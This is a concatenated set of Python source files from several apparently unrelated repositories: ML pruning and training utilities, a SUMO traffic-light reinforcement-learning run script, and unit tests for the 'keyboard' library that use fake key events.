if epoch < self.grad_turn_off_epoch+1:
self.grad_norm_cum['{}l_{}n'.format(
l, n)] += p_node.norm().view(-1) # cumulative value
p_layers.to(self.device)
# pruning the gradient
if epoch > self.grad_turn_off_epoch:
            l = -1  # start from -1 so indexing begins at 0
for p in p_groups:
for i, p_layers in enumerate(p['params']):
if len(p_layers.size()) > 1: # weight filtering
l += 1 # layer
# print(p_layers.data[self.grad_off_mask[l]].sum(),'a')
p_layers.grad[self.grad_off_mask[l]] = torch.zeros_like(
p_layers.grad[self.grad_off_mask[l]]) # weight prune
else:
p_layers.grad[self.grad_off_mask[l]] = torch.zeros_like(
p_layers.grad[self.grad_off_mask[l]]) # bias prune
def turn_requires_grad_(self,p_groups,on_off):
if self.configs['mode']=='train_weight_prune':
for p in p_groups:
for i,p_layers in enumerate(p['params']):
p_layers.requires_grad_(on_off)
def prune_weight(self, p_groups,epoch,batch_idx):
if self.configs['mode'] == 'train_weight_prune' and epoch >= self.grad_turn_off_epoch+1:
            l = -1  # start from -1 so indexing begins at 0; avoids avgpooling/maxpooling, which look like biases
#turn off judgement
if epoch == self.grad_turn_off_epoch+1 and batch_idx == 0:
for p in p_groups:
for i,p_layers in enumerate(p['params']):
if p['params'][-1].size() == p_layers.size() or p['params'][-2].size() == p_layers.size():
continue
if len(p_layers.size())>1: #weight filtering
l+=1
for n, p_node in enumerate(p_layers):
if self.grad_norm_cum['{}l_{}n'.format(l, n)] < self.configs['threshold']:
self.grad_off_mask[l][n] = True
print('{}l_{}n grad_off'.format(l, n))
self.grad_off_freq_cum += 1
            # turn back on the designated nodes that do not need to be off
if epoch == self.grad_turn_off_epoch+1 and batch_idx == 0 and self.grad_turn_on_dict is not None:
print("Turn on the designated node=====")
for l_key in self.grad_turn_on_dict.keys():
for n in self.grad_turn_on_dict[l_key]:
self.grad_off_mask[l_key][n] = False
print("{}l_{}n grad Turn on and No Prune".format(l_key, n))
print("End Turn on=====================")
# Record Prune Rate
self.logWriter.add_scalar(
'train/grad_off_freq_cum', self.grad_off_freq_cum, epoch)
self.turn_requires_grad_(p_groups,on_off=False)
#weight prune
            l = -1  # start from -1 so indexing begins at 0; avoids avgpooling/maxpooling treated as bias
for p in p_groups:
for i,p_layers in enumerate(p['params']):
if len(p_layers.size())>1: #weight filtering
l+=1 #layer
# print(p_layers.data[self.grad_off_mask[l]].sum(),'b')
p_layers.data[self.grad_off_mask[l]]=torch.zeros_like(p_layers.data[self.grad_off_mask[l]])
else:# bias
p_layers.data[self.grad_off_mask[l]]=torch.zeros_like(p_layers.data[self.grad_off_mask[l]])
#print(l,"layer",torch.nonzero(p_layers.grad).size()," ",p_layers.grad.size())
self.turn_requires_grad_(p_groups,on_off=True)
```
#### File: ml_benchmark/Learner/cvx_learner.py
```python
import time
import os
import sys
import torch
from torch import optim
from Learner.base_learner import BaseLearner
from CustomOptimizer.cvx import CVXOptimizer
class CVXLearner(BaseLearner):
def __init__(self, model, time_data,file_path, configs):
super(CVXLearner,self).__init__(model,time_data,file_path,configs)
if 'train_cvx' in configs['mode']:
reduction='none'
self.optimizer=CVXOptimizer(self.optimizer)
else:
raise NotImplementedError
self.criterion=self.criterion.__class__(reduction=reduction) # grad vector (no scalar)
if os.path.exists(os.path.join(self.making_path, time_data)) == False:
os.mkdir(os.path.join(self.making_path, time_data))
def run(self):
print("Training {} epochs".format(self.configs['epochs']))
best_accuracy=0.0
# Train
for epoch in range(1, self.configs['epochs'] + 1):
print('Learning rate: {}'.format(self.scheduler.optimizer.param_groups[0]['lr']))
train_metric = self._train(epoch)
eval_metric = self._eval()
self.scheduler.step()
loss_dict = {'train': train_metric['loss'], 'eval': eval_metric['loss']}
accuracy_dict = {'train': train_metric['accuracy'], 'eval': eval_metric['accuracy']}
self.logWriter.add_scalars('loss', loss_dict, epoch)
self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
best_accuracy=max(eval_metric['accuracy'],best_accuracy)
self.early_stopping(eval_metric['loss'], self.model)
if self.early_stopping.early_stop:
print("Early stopping")
break
            if self.device == 'cuda':  # match the 'cuda' device string used elsewhere
torch.cuda.empty_cache()
print("Best Accuracy: "+str(best_accuracy))
self.configs['train_end_epoch']=epoch
configs = self.save_grad(epoch)
return configs
def _train(self, epoch):
tik = time.time()
        self.model.train()  # set train mode
running_loss = 0.0
total_len_data=0
len_data=dict()
class_correct_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
len_data[i]=0
current_len_data=0
total_len_data=len(self.train_loader.dataset)
for idx,(data,target) in enumerate(self.train_loader):
            data, target = data.to(self.device), target.to(self.device)  # move to gpu
output = self.model(data)
loss = self.criterion(output, target)
pred = output.argmax(dim=1, keepdim=True)
for class_idx in target.unique():
class_correct_dict[int(class_idx)]+=pred.eq(target.view_as(pred))[target==class_idx].sum().item()
len_data[int(class_idx)]+=(target==class_idx).sum()
running_loss+=loss.mean().item()
self.optimizer.zero_grad()
self.optimizer.cvx_backward(loss)
self.optimizer.step()
current_len_data+=target.size()[0]
if idx % self.log_interval == 0:
print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, current_len_data, total_len_data ,
100.0 * float(current_len_data) / float(total_len_data), loss.mean().item()), end='')
tok=time.time()
if self.configs['log_extraction']=='true':
sys.stdout.flush()
print("\n ============================\nTrain Learning Time:{:.2f}s \t Class Accuracy".format(tok-tik))
total_correct=0
for class_correct_key in class_correct_dict.keys():
class_accur=100.0*float(class_correct_dict[class_correct_key])/float(len_data[class_correct_key])
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],len_data[class_correct_key],class_accur))
total_correct+=class_correct_dict[class_correct_key]
running_accuracy=100.0*float(total_correct)/float(total_len_data)
train_metric={'accuracy':running_accuracy,'loss': running_loss/float(total_len_data)}
print('{} epoch Total Accuracy: {:.2f}%, Total Loss: {}\n'.format(epoch,train_metric['accuracy'],train_metric['loss']))
return train_metric
def _eval(self):
self.model.eval()
eval_loss = 0
correct = 0
class_correct_dict=dict()
class_total_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
class_total_dict[i]=0
with torch.no_grad():
for data, target in self.test_loader:
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
eval_loss += loss.mean().item()
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
for label in target.unique():
# print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
class_correct_dict[int(label)]+=pred.eq(target.view_as(pred))[target==label].sum().item()
class_total_dict[int(label)]+=(target==label).sum().item()
eval_loss = eval_loss / len(self.test_loader.dataset)
correct=0
print("=================Eval=================")
for class_correct_key in class_correct_dict.keys():
correct+=class_correct_dict[class_correct_key]
class_accur=100.0*float(class_correct_dict[class_correct_key])/class_total_dict[class_correct_key]
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],class_total_dict[class_correct_key],class_accur))
print('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n==================='.format(
eval_loss, correct, len(self.test_loader.dataset),
100.0 * correct / float(len(self.test_loader.dataset))))
if self.configs['log_extraction']=='true':
sys.stdout.flush()
eval_accuracy = 100.0*correct/float(len(self.test_loader.dataset))
eval_metric={'accuracy':eval_accuracy,'loss': eval_loss}
return eval_metric
```
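The per-class bookkeeping in `_train` and `_eval` above computes a batch-wide correctness mask once, then slices it per label. A minimal, self-contained sketch of that masking pattern (the logits and labels below are made up for illustration):
```python
import torch

# Fake batch: 6 samples, 3 classes (illustrative values only).
output = torch.tensor([[2.0, 0.1, 0.3],
                       [0.2, 1.5, 0.1],
                       [0.1, 0.2, 3.0],
                       [1.0, 0.9, 0.8],
                       [0.1, 2.2, 0.3],
                       [0.4, 0.3, 0.2]])
target = torch.tensor([0, 1, 2, 1, 1, 0])

pred = output.argmax(dim=1, keepdim=True)     # predicted class per sample
correct_mask = pred.eq(target.view_as(pred))  # batch-wide correctness

for c in target.unique():
    n_correct = correct_mask[target == c].sum().item()  # correct within class c
    n_total = (target == c).sum().item()
    print('{} class: {}/{} {:.2f}%'.format(
        int(c), n_correct, n_total, 100.0 * n_correct / n_total))
```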
#### File: ml_benchmark/Model/baseNet.py
```python
def get_hyperparams(nn_type):
if nn_type == 'lenet5':
dataset = 'mnist'
epochs = 60
lr=1e-2
momentum=0.9
elif nn_type == 'vgg16':
dataset = 'cifar10'
epochs = 300
lr=1e-2
momentum=0.9
elif nn_type=='lenet300_100':
dataset = 'mnist'
epochs = 60
lr=1e-2
momentum=0.9
elif 'resnet' in nn_type:
dataset='cifar10'
lr=1e-1
epochs=200
momentum=0.9
elif nn_type=='convnet':
dataset = 'cifar10'
epochs = 200
lr=1e-2
momentum=0.9
elif nn_type=='alexnet':
dataset='cifar10'
epochs=200
lr=1e-2
momentum=0.9
else:
print("No algorithm available")
raise NotImplementedError
return dataset,epochs,lr,momentum
class BaseNet():
def __init__(self,configs):
if configs['dataset'] in ['cifar10','fashionmnist','mnist']:
configs['num_classes']=10
elif configs['dataset']=='cifar100':
configs['num_classes']=100
else:#imagenet
configs['num_classes']=1000
if configs['model'] == 'lenet5':
from Model.lenet5 import LeNet5
model = LeNet5(configs).to(configs['device'])
elif configs['model'][:3] == 'vgg':
from Model.vgg import VGG
model = VGG(configs).to(configs['device'])
# print(model)
elif configs['model']=='lenet300_100':
from Model.lenet300_100 import LeNet_300_100
model = LeNet_300_100(configs).to(configs['device'])
elif configs['model'][:6]=='resnet':
from Model.resnet import ResNet
model = ResNet(configs).to(configs['device'])
elif configs['model']=='convnet':
from Model.convnet import ConvNet
model = ConvNet(configs).to(configs['device'])
elif configs['model']=='alexnet':
from Model.alexnet import AlexNet
model = AlexNet(configs).to(configs['device'])
else:
print("No Model")
raise NotImplementedError
self.model=model
if 'offkd' in configs['mode'] or 'onkd' in configs['mode']:
import copy
KDCONFIGS=copy.deepcopy(configs)
KDCONFIGS['model']=configs['pretrained_model']
if configs['pretrained_model'] == 'lenet5':
from Model.lenet5 import LeNet5
pretrained_model = LeNet5(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model'][:3] == 'vgg':
from Model.vgg import VGG
pretrained_model = VGG(KDCONFIGS).to(configs['device'])
# print(pretrained_model)
elif configs['pretrained_model']=='lenet300_100':
from Model.lenet300_100 import LeNet_300_100
pretrained_model = LeNet_300_100(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model'][:6]=='resnet':
from Model.resnet import ResNet
pretrained_model = ResNet(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model']=='convnet':
from Model.convnet import ConvNet
pretrained_model = ConvNet(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model']=='alexnet':
from Model.alexnet import AlexNet
pretrained_model = AlexNet(KDCONFIGS).to(configs['device'])
else:
print("No Model")
raise NotImplementedError
import torch
if 'offkd' in configs['mode']:
pretrained_model.load_state_dict(torch.load('./pretrained_data/{}_{}.pth'.format(configs['pretrained_model'],configs['dataset'])))
self.pretrained_model=pretrained_model.to(configs['device'])
```
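The `if/elif` chain in `BaseNet.__init__` is the repo's model dispatch. An equivalent table-driven sketch (assuming the same `Model.*` modules and class names imported above) keeps the mapping in one place:
```python
import importlib

# Sketch only: name -> (module, class) registry mirroring BaseNet.__init__.
MODEL_REGISTRY = {
    'lenet5': ('Model.lenet5', 'LeNet5'),
    'lenet300_100': ('Model.lenet300_100', 'LeNet_300_100'),
    'vgg': ('Model.vgg', 'VGG'),
    'resnet': ('Model.resnet', 'ResNet'),
    'convnet': ('Model.convnet', 'ConvNet'),
    'alexnet': ('Model.alexnet', 'AlexNet'),
}

def build_model(configs):
    name = configs['model']
    # Prefix families ('vgg16', 'resnet18', ...) resolve to their family entry.
    key = next((k for k in ('vgg', 'resnet') if name.startswith(k)), name)
    if key not in MODEL_REGISTRY:
        raise NotImplementedError('No model: {}'.format(name))
    module_name, class_name = MODEL_REGISTRY[key]
    cls = getattr(importlib.import_module(module_name), class_name)
    return cls(configs).to(configs['device'])
```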
#### File: ml_benchmark/Pruning/LRP.py
```python
import torch
import torch.optim as optim
class LateralInhibition():#LRN
def __init__(self,optimizer:optim):
self._optim=optimizer
@property
def optimizer(self):
return self._optim
@property
def param_groups(self):
return self._optim.param_groups
def step(self):
return self._optim.step()
def backward(self,loss):
grads, shapes, has_grads = self._pack_grad(loss)
#grad = self._unflatten_grad(grads, shapes)
#self._set_grad(grad)
for group in self._optim.param_groups:
for g_layers,p in zip(grads,group['params']):
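                # Note: all three branches below currently apply the same
                # inhibition; they are presumably kept so that CNN kernels,
                # FC weights and biases can be treated differently later.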
if len(g_layers.size()) > 1: # weight filtering
if len(g_layers.size())==4: #CNN
b_matrix=self._lateral_inhibition(g_layers)
elif len(g_layers.size())==2: #FC
b_matrix=self._lateral_inhibition(g_layers)
else: #Bias
b_matrix=self._lateral_inhibition(g_layers)
p.grad=b_matrix.clone()
def _lateral_inhibition(self,grad_layers):
k,alpha,beta,num=2, 1e-4, 0.75, 5
b_matrix=torch.zeros_like(grad_layers)
for n,g_node in enumerate(grad_layers):
lower_idx=int(max(0,n-num/2))
upper_idx=int(min(grad_layers.size()[0]-1,n+num/2))
gain=torch.pow(k+alpha*torch.square(grad_layers[lower_idx:upper_idx]).sum(),beta)
b_matrix[n]=torch.div(g_node,gain)
return b_matrix
### Original
def _pack_grad(self, loss):
self._optim.zero_grad(set_to_none=True)
loss.backward()
grad, shape, has_grad = self._retrieve_grad()
return grad, shape, has_grad
### Original
def _retrieve_grad(self):
grad, shape, has_grad = [], [], []
for group in self._optim.param_groups:
for p in group['params']:
# if p.grad is None: continue
# tackle the multi-head scenario
if p.grad is None:
shape.append(p.shape)
grad.append(torch.zeros_like(p).to(p.device))
has_grad.append(torch.zeros_like(p).to(p.device))
continue
shape.append(p.grad.shape)
grad.append(p.grad.clone())
has_grad.append(torch.ones_like(p).to(p.device))
return grad, shape, has_grad
```
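`_lateral_inhibition` divides each gradient row by an LRN-style gain, `(k + alpha * sum(g**2)) ** beta`, computed over a window of `num` neighbouring rows (k=2, alpha=1e-4, beta=0.75, num=5 above). A hypothetical usage sketch, assuming the repo root is on `sys.path` so `Pruning.LRP` resolves to the file above:
```python
import torch
import torch.nn as nn
import torch.optim as optim
from Pruning.LRP import LateralInhibition  # the file above; import path is assumed

# Wrap a plain SGD optimizer and route the backward pass through it.
model = nn.Linear(4, 3)
li = LateralInhibition(optim.SGD(model.parameters(), lr=0.1))

x, y = torch.randn(8, 4), torch.randint(0, 3, (8,))
loss = nn.functional.cross_entropy(model(x), y)
li.backward(loss)  # computes grads, then divides each by its local LRN gain
li.step()          # applies the inhibited gradients via the wrapped optimizer
```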
#### File: ml_benchmark/Visualization/using_pyplot.py
```python
import torch
import numpy as np
import os
import matplotlib.pyplot as plt
import math
class Pyplot_node():
def __init__(self, fileTensor, config, path,file_name):
NUM_ROWS = config['epochs'] * \
math.ceil(60000.0/float(config['batch_size']))
if config['model'] == 'lenet5':
from NeuralNet.lenet5 import w_size_list, b_size_list, NN_size_list, model_list, kernel_size_list
elif config['model'][:3] == 'vgg':
from NeuralNet.vgg import get_nn_config
w_size_list, b_size_list, NN_size_list, model_list, kernel_size_list = get_nn_config(
config['model'])
if os.path.exists(os.path.join(path,file_name)) == False:
os.mkdir(os.path.join(path,file_name))
dir_list=['node_info','node_integrated_info']
for dir in dir_list:
if os.path.exists(os.path.join(path,file_name,dir)) == False:
os.mkdir(os.path.join(path,file_name,dir))
self.path = path
self.file_name=file_name
self.w_size_list = w_size_list
self.b_size_list = b_size_list
self.NN_size_list = NN_size_list
self.model_list = model_list
self.kernel_size_list = kernel_size_list
self.nodes_integrated = dict()
total_data = fileTensor.clone()
self.time_list = list()
for t, data in enumerate(total_data):
tmp_data = data.detach().clone()
self.time_list.append(t)
if t % 100 == 0:
print('\r {} line complete'.format(t), end='')
            for l, num_w in enumerate(b_size_list):  # bias sizes are used because we observe per-node values
# weight
node_w = tmp_data[:num_w].detach().clone()
tmp_data = tmp_data[num_w:]
                for n, node_info in enumerate(node_w):  # per node
if t == 0:
self.nodes_integrated['avg_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['norm_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['var_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['avg_{}l_{}n'.format(
l, n)].append(node_info[0])
self.nodes_integrated['norm_{}l_{}n'.format(
l, n)].append(node_info[1])
self.nodes_integrated['var_{}l_{}n'.format(
l, n)].append(node_info[2])
print("File Visualization Start")
self.info_type_list = ['avg', 'avg_cum',
'norm', 'norm_cum', 'var', 'var_cum']
def time_write_(self, layer, node, info_type):
plt.clf()
plt.plot(
self.time_list, torch.tensor(self.nodes_integrated['{}_{}l_{}n'.format(info_type, layer, node)]).tolist())
plt.xlabel('iter')
plt.ylabel('{} of grad in node'.format(info_type))
plt.savefig(os.path.join(self.path,self.file_name,
'node_info', '{}_{}l_{}n.png'.format(info_type, layer, node)), dpi=100)
def time_write(self):
for l, num_node in enumerate(self.b_size_list):
for n in range(num_node):
self.nodes_integrated['avg_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['avg_{}l_{}n'.format(l, n)]), dim=0)
self.nodes_integrated['var_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['var_{}l_{}n'.format(l, n)]), dim=0)
self.nodes_integrated['norm_cum_{}l_{}n'.format(l, n)] = torch.cumsum(torch.tensor(
self.nodes_integrated['norm_{}l_{}n'.format(l, n)]), dim=0)
for info_type in self.info_type_list:
self.time_write_(l, n, info_type)
# integrated value plot
def time_integrated_write_(self, num_node, layer, info_type):
plt.clf()
legend_list = list()
for n in range(num_node):
plt.plot(
self.time_list, self.nodes_integrated['{}_{}l_{}n'.format(info_type, layer, n)])
            legend_list.append('{}l_{}n'.format(layer, n))
plt.xlabel('iter')
        plt.ylabel('{} of grad in node'.format(info_type))
plt.legend(legend_list)
        plt.savefig(os.path.join(self.path,self.file_name,
                     'node_integrated_info', '{}_{}l.png'.format(info_type, layer)), dpi=150)
del legend_list
def time_integrated_write(self):
for l, num_node in enumerate(self.b_size_list):
for info_type in self.info_type_list:
self.time_integrated_write_(num_node, l, info_type)
``` |
{
"source": "3neutronstar/traffic-optimization_RL",
"score": 2
} |
#### File: traffic-optimization_RL/Discrete/run.py
```python
import argparse
import json,os, sys
import time
import torch
import torch.optim as optim
import traci
import random
import numpy as np
import traci.constants as tc
from sumolib import checkBinary
from utils import interest_list
from configs import EXP_CONFIGS
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="choose the mode",
epilog="python run.py mode")
# required input parameters
parser.add_argument(
'mode', type=str,
        help='train, test, or simulate; "train_old" runs the legacy training code')
parser.add_argument(
'--network', type=str, default='grid',
help='choose network in Env')
# optional input parameters
parser.add_argument(
'--disp', type=str, default='no',
help='show the process while in training')
parser.add_argument(
'--replay_name', type=str, default=None,
        help='test mode only: the file name of saved weights to load.')
parser.add_argument(
'--algorithm', type=str, default='dqn',
help='choose algorithm dqn, reinforce, a2c, ppo.')
parser.add_argument(
'--model', type=str, default='base',
        help='choose the model: base or frap.')
parser.add_argument(
'--gpu', type=bool, default=False,
        help='use the GPU if available.')
parser.add_argument(
'--phase', type=str, default=8,
        help='choose phase 4 or 8 (currently FRAP is available only on 8)')
return parser.parse_known_args(args)[0]
'''
New version of training file
'''
def train(flags, time_data, configs, sumoConfig):
# check gui option
if flags.disp == 'yes':
sumoBinary = checkBinary('sumo-gui')
else:
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig, '--start']
# configs setting
configs['algorithm'] = flags.algorithm.lower()
print("training algorithm: ", configs['algorithm'])
configs['num_phase']=int(flags.phase)
    if flags.algorithm.lower() == 'super_dqn':  # set the action space and size
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'base':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'frap':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 16
configs['model'] = 'frap'
if flags.algorithm.lower() == 'dqn':
from train import dqn_train
dqn_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'super_dqn':
from train import super_dqn_train
super_dqn_train(configs, time_data, sumoCmd)
'''
Old version of training file
'''
def train_old(flags, time_data, configs, sumoConfig):
# check gui option
if flags.disp == 'yes':
sumoBinary = checkBinary('sumo-gui')
else:
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig, '--start']
# configs setting
configs['algorithm'] = flags.algorithm.lower()
print("training algorithm: ", configs['algorithm'])
configs['num_phase']=int(flags.phase)
    if flags.algorithm.lower() == 'super_dqn':  # set the action space and size
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'base':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 8+configs['num_phase']
configs['model'] = 'base'
elif flags.model.lower() == 'frap':
configs['action_space'] = configs['num_phase']
configs['action_size'] = 1
configs['state_space'] = 16
configs['model'] = 'frap'
if flags.algorithm.lower() == 'dqn':
from train_old import dqn_train
dqn_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'reinforce':
from train_old import REINFORCE_train
REINFORCE_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'a2c':
from train_old import a2c_train
a2c_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'ppo':
from train_old import ppo_train
ppo_train(configs, time_data, sumoCmd)
elif flags.algorithm.lower() == 'super_dqn':
from train_old import super_dqn_train
super_dqn_train(configs, time_data, sumoCmd)
def test(flags, configs, sumoConfig):
from Env.Env import TL3x3Env
from Agent.dqn import Trainer
from Env.MultiEnv import GridEnv
from utils import save_params, load_params, update_tensorboard
# init test setting
sumoBinary = checkBinary('sumo-gui')
sumoCmd = [sumoBinary, "-c", sumoConfig]
# setting the rl list
tl_rl_list = configs['tl_rl_list']
MAX_STEPS = configs['max_steps']
reward = 0
traci.start(sumoCmd)
agent = Trainer(configs)
# setting the replay
if flags.replay_name is not None:
agent.load_weights(flags.replay_name)
configs = load_params(configs, flags.replay_name)
env = TL3x3Env( configs)
step = 0
# state initialization
state = env.get_state()
# agent setting
total_reward = 0
arrived_vehicles = 0
action_distribution = tuple()
with torch.no_grad():
while step < MAX_STEPS:
action = agent.get_action(state)
action_distribution += action
            env.step(action)  # apply the action
            for _ in range(20):  # update the action every 10 seconds
env.collect_state()
traci.simulationStep()
step += 1
traci.trafficlight.setRedYellowGreenState(tl_rl_list[0], 'y'*28)
for _ in range(5):
traci.simulationStep()
env.collect_state()
step += 1
reward = env.get_reward()
next_state = env.get_state()
# agent.save_replay(state, action, reward, next_state)
state = next_state
total_reward += reward
step += 1
if step == MAX_STEPS:
done = True
# agent.update(done) # no update in
# loss += agent.get_loss() # 총 loss
arrived_vehicles += traci.simulation.getArrivedNumber() # throughput
traci.simulationStep()
# if step % 200 == 0:
agent.target_update()
traci.close()
print('======== return: {} arrived number:{}'.format(
total_reward, arrived_vehicles))
def simulate(flags, configs, sumoConfig):
sumoBinary = checkBinary('sumo')
sumoCmd = [sumoBinary, "-c", sumoConfig]
MAX_STEPS = configs['max_steps']
traci.start(sumoCmd)
traci.simulation.subscribe([tc.VAR_ARRIVED_VEHICLES_NUMBER])
avg_waiting_time = 0
avg_velocity = 0
step = 0
# agent setting
arrived_vehicles = 0
avg_velocity = 0
while step < MAX_STEPS:
traci.simulationStep()
step += 1
for _, edge in enumerate(interest_list):
avg_waiting_time += traci.edge.getWaitingTime(edge['inflow'])
# vehicle_list = traci.vehicle.getIDList()
# for i, vehicle in enumerate(vehicle_list):
# speed = traci.vehicle.getSpeed(vehicle)
# avg_velocity = float((i)*avg_velocity+speed) / \
# float(i+1) # incremental avg
arrived_vehicles += traci.simulation.getAllSubscriptionResults()[
''][0x79] # throughput
traci.close()
print('======== arrived number:{} avg waiting time:{},avg velocity:{}'.format(
arrived_vehicles, avg_waiting_time/MAX_STEPS, avg_velocity))
def main(args):
random_seed=20000
random.seed(random_seed)
torch.manual_seed(random_seed)
np.random.seed(random_seed)
flags = parse_args(args)
configs=EXP_CONFIGS
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda and flags.gpu == True else "cpu")
#device = torch.device('cpu')
print("Using device: {}".format(device))
configs['device'] = str(device)
configs['current_path'] = os.path.dirname(os.path.abspath(__file__))
configs['mode'] = flags.mode.lower()
# init train setting
time_data = time.strftime('%m-%d_%H-%M-%S', time.localtime(time.time()))
configs['time_data'] = str(time_data)
# check the network
if flags.network.lower() == 'grid':
        from grid import GridNetwork  # change this import to switch networks (refactor planned)
configs['grid_num'] = 3
if flags.algorithm.lower()=='super_dqn':
configs['grid_num']=3
configs['file_name'] = '{}x{}grid'.format(
configs['grid_num'], configs['grid_num'])
        configs['grid_side'] = 'in'  # an 'out' mode is planned; in 'in' mode only the inner traffic lights are controlled
network = GridNetwork(configs, grid_num=configs['grid_num'])
network.generate_cfg(True, configs['mode'])
# check the mode
if configs['mode'] == 'train':
configs['mode'] = 'train'
sumoConfig = os.path.join(
configs['current_path'], 'training_data', time_data, 'net_data', configs['file_name']+'_train.sumocfg')
train(flags, time_data, configs, sumoConfig)
elif configs['mode'] == 'train_old':
configs['mode'] = 'train'
sumoConfig = os.path.join(
configs['current_path'], 'training_data', time_data, 'net_data', configs['file_name']+'_train.sumocfg')
train_old(flags, time_data, configs, sumoConfig)
elif configs['mode'] == 'test':
configs['mode'] = 'test'
sumoConfig = os.path.join(
configs['current_path'], 'Net_data', configs['file_name']+'_test.sumocfg')
test(flags, configs, sumoConfig)
else: # simulate
configs['mode'] = 'simulate'
sumoConfig = os.path.join(
configs['current_path'], 'Net_data', configs['file_name']+'_simulate.sumocfg')
simulate(flags, configs, sumoConfig)
# check the environment
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
if __name__ == '__main__':
main(sys.argv[1:])
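# Example invocations (a sketch; flags as defined in parse_args above):
#   python run.py simulate --network grid
#   python run.py train --algorithm dqn --model base --phase 8
#   python run.py test --replay_name <saved-weights-name>  # name is a placeholder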
``` |
{
"source": "3ngthrust/Symbolic-Math-Hotkeys",
"score": 3
} |
#### File: Symbolic-Math-Hotkeys/keyboard/_keyboard_tests.py
```python
import time
import unittest
import string
import keyboard
from ._keyboard_event import KeyboardEvent, canonical_names, KEY_DOWN, KEY_UP
from ._suppress import KeyTable
# Fake events with fake scan codes for a totally deterministic test.
all_names = set(canonical_names.values()) | set(string.ascii_lowercase) | set(string.ascii_uppercase) | {'shift'}
scan_codes_by_name = {name: i for i, name in enumerate(sorted(all_names))}
scan_codes_by_name.update({key: scan_codes_by_name[value]
for key, value in canonical_names.items()})
scan_codes_by_name['shift2'] = scan_codes_by_name['shift']
class FakeEvent(KeyboardEvent):
def __init__(self, event_type, name, scan_code=None):
KeyboardEvent.__init__(self, event_type, scan_code or scan_codes_by_name[name], name)
class FakeOsKeyboard(object):
def __init__(self):
self.listening = False
self.append = None
self.queue = None
self.allowed_keys = KeyTable(keyboard.press, keyboard.release)
self.init = lambda: None
self.is_allowed = lambda *args: True
def listen(self, queue, is_allowed):
self.listening = True
self.queue = queue
self.is_allowed = is_allowed
def get_key_name(self, scan_code):
return next(name for name, i in sorted(scan_codes_by_name.items()) if i == scan_code and name not in canonical_names)
def press(self, key):
if not isinstance(key, str):
key = self.get_key_name(key)
self.append((KEY_DOWN, key))
def release(self, key):
if not isinstance(key, str):
key = self.get_key_name(key)
self.append((KEY_UP, key))
def map_char(self, char):
try:
return scan_codes_by_name[char.lower()], ('shift',) if char.isupper() else ()
except KeyError as e:
raise ValueError(e)
def type_unicode(self, letter):
event = FakeEvent('unicode', 'a')
event.name = letter
self.append(event)
class TestKeyboard(unittest.TestCase):
# Without this attribute Python2 tests fail for some unknown reason.
__name__ = 'what'
@staticmethod
def setUpClass():
keyboard._os_keyboard = FakeOsKeyboard()
keyboard._listener.start_if_necessary()
assert keyboard._os_keyboard.listening
assert keyboard._listener.listening
def setUp(self):
self.events = []
keyboard._pressed_events.clear()
keyboard._os_keyboard.append = self.events.append
def tearDown(self):
keyboard.unhook_all()
# Make sure there's no spill over between tests.
self.wait_for_events_queue()
def press(self, name, scan_code=None):
is_allowed = keyboard._os_keyboard.is_allowed(name, False)
keyboard._os_keyboard.queue.put(FakeEvent(KEY_DOWN, name, scan_code))
self.wait_for_events_queue()
return is_allowed
def release(self, name, scan_code=None):
is_allowed = keyboard._os_keyboard.is_allowed(name, True)
keyboard._os_keyboard.queue.put(FakeEvent(KEY_UP, name, scan_code))
self.wait_for_events_queue()
return is_allowed
def click(self, name, scan_code=None):
return self.press(name, scan_code) and self.release(name, scan_code)
def flush_events(self):
self.wait_for_events_queue()
events = list(self.events)
        # Ugly, but required to work in Python2. Python3 has list.clear
del self.events[:]
return events
def wait_for_events_queue(self):
keyboard._listener.queue.join()
def test_matches(self):
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), scan_codes_by_name['shift']))
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), 'shift'))
self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift'), 'shift2'))
